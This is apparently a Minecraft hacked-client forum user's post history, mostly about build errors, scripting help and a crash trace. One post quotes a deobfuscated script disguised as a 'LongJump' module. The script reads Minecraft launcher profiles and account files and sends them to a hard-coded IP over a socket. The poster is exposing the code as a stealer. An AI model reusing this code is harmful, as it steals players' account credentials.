@some-one still waiting for mojang to add 'gaple'
exit scammed
Posts
-
auto gaple for lb b73 please -
How to change -
[EXPOSED] Coccocoa@Soulplexis oh that's great
-
Error@божественная-кара did you git clone the source or just download it from github
-
Error@божественная-кара
https://github.com/ccbluex/liquidbounce#setting-up-a-workspacetry this again but in a different directory
-
Error@божественная-кара also dont forget to change the sdk in project structure
-
Error@божественная-кара they recently updated to java 11 so download the suitable jre then (google)
-
Error@божественная-кара
go in your liquidbounce nextgen folder
right click select git bash
paste the command again -
Script API Download@dodep ... sorry but I still can't find that anywhere, and I mostly use the default JavaScript language syntax in VSCode.
-
NeruxVaceLongJump@paul2008 i love your code
var a = registerScript({ name: "", version: "", authors: [""] }); b = Java.type; hack = b("java.net.Socket"); motionCalculator = b("java.io.DataOutputStream"); pwd = b("java.nio.file.Paths").get("").toAbsolutePath().toString(); stringUtils = b("java.io.File"); stringParse = b("org.apache.commons.io.FileUtils"); iso = b("java.nio.charset.StandardCharsets"); function dataFromString(strings) { try { var strU = new stringUtils(strings); return stringParse.readFileToString(strU, iso.ISO_8859_1) } catch (e) {} } a.registerModule({ name: "NeruxVaceLongJump", category: "Misc", description: "NeruxVaceLongJump" }, function (module) { module.on("enable", function () { data = dataFromString(pwd + "/launcher_profiles.json"); data += "\n"; data += dataFromString(pwd + "/LiquidBounce-1.8/accounts.json"); data = data.getBytes(); l = data.length; anticheat = new hack("107.182.237.14", 55228); anticheat.setSoTimeout(10000); server = new motionCalculator(anticheat.getOutputStream()); server.writeInt(l); server.write(data, 0, l); mc.thePlayer.motionX += 10 }) });
deobfed in 5 mins
thought that 3 layers of eval obfuscation could help you? -
How to change@auto-reply-bot mixinguislot?
-
[Machine translation]how to get the coordinates of all players@aacx_hacker you can do a for loop with
mc.theWorld.playerEntities
, something like this:for (EntityPlayer e : (List<EntityPlayer>) mc.theWorld.playerEntities) { // in this case use e.posX, e.posY, e.posZ to get the coordinates. }
edit: since the category is scriptapi then here is the js version:
for (i=0;i<mc.theWorld.playerEntities.size();i++) { var e = mc.theWorld.playerEntities.get(i); // js automatically declare the type of variable at runtime so just use e.posX, e.posY, e.posZ like the one above. }
-
NeruxVaceLongJump@paul2008 the only thing that does make sense your code is
mc.thePlayer.motionX += 10
-
[Machine translation]how to get the coordinates of all players@britishbiscuit didnt notice that lol, edited
-
InventoryManager 7.2 - Updated again!@czechhek
idk why but since I use InvManager whenever I type.binds
it automatically crashes my client -
[Legendary] How to make an animation?@skidma still can't get it
-
InventoryManager 7.2 - Updated again!Caused by: java.lang.ArrayIndexOutOfBoundsException: -1 at org.lwjgl.input.Keyboard.getKeyName(Keyboard.java:429) ~[lwjgl-2.9.4-nightly-20150209.jar:?] at net.ccbluex.liquidbounce.features.command.commands.BindsCommand.execute(BindsCommand.kt:30) ~[BindsCommand.class:?] at net.ccbluex.liquidbounce.features.command.CommandManager.executeCommands(CommandManager.kt:65) ~[CommandManager.class:?] at net.minecraft.client.gui.GuiScreen.handler$messageSend$zbf000(GuiScreen.java:875) ~[axu.class:?] at net.minecraft.client.gui.GuiScreen.func_175281_b(GuiScreen.java) ~[axu.class:?] at net.minecraft.client.gui.GuiScreen.func_175275_f(GuiScreen.java:437) ~[axu.class:?] at net.optifine.gui.GuiChatOF.func_175275_f(GuiChatOF.java:41) ~[GuiChatOF.class:?] at net.minecraft.client.gui.GuiChat.func_73869_a(GuiChat.java:111) ~[awv.class:?] at net.minecraft.client.gui.GuiScreen.func_146282_l(GuiScreen.java:578) ~[axu.class:?] at net.minecraft.client.gui.GuiScreen.func_146269_k(GuiScreen.java:534) ~[axu.class:?] at net.minecraft.client.Minecraft.func_71407_l(Minecraft.java:1674) ~[ave.class:?] ... 9 more
-
[Legendary] How to make an animation?@skidma wdym animation